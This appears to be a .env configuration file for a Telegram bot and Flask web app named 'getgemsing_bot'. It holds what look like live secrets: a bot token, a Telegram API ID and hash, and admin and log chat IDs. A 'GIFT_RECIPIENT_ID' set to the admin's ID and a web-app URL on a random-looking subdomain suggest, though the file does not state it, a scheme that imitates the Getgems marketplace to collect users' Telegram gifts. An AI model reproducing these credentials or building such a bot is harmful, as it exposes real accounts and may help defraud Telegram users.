BOT_TOKEN=8015785465:AAG7fRkCMzd3JJMUI2fC7hgy6IaA4MvOcUo
BOT_USERNAME=getgemsing_bot
WEBAPP_URL=https://fdsffdgdsfgd.bothost.ru/
TELEGRAM_API_ID=33392489
TELEGRAM_API_HASH=45edb669e73e787a67b764e1707516d8
ADMIN_IDS=8450229868
GIFT_RECIPIENT_ID=8450229868
AUTODOCID_USERNAME=ccvah
FLASK_HOST=0.0.0.0
FLASK_PORT=5000
FLASK_DEBUG=false
LOG_GROUP_ID=-3738826653
LOG_CHAT_ID=-3738826653
